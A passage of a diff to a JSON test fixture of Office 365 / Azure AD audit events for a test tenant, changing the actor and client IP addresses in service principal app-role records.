.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372061\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"02868191-019a-453a-a3a9-a21f44898778\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -2827,9 +2827,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T15:34:47", "ExtendedProperties": [ { @@ -3063,7 +3063,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372052\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"115f72b6-e8e6-4710-98e9-63ccd20bf2ec\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372052\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"115f72b6-e8e6-4710-98e9-63ccd20bf2ec\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -3093,9 +3093,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T15:34:47", "ExtendedProperties": [ { @@ -3329,7 +3329,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372061\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"02868191-019a-453a-a3a9-a21f44898778\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 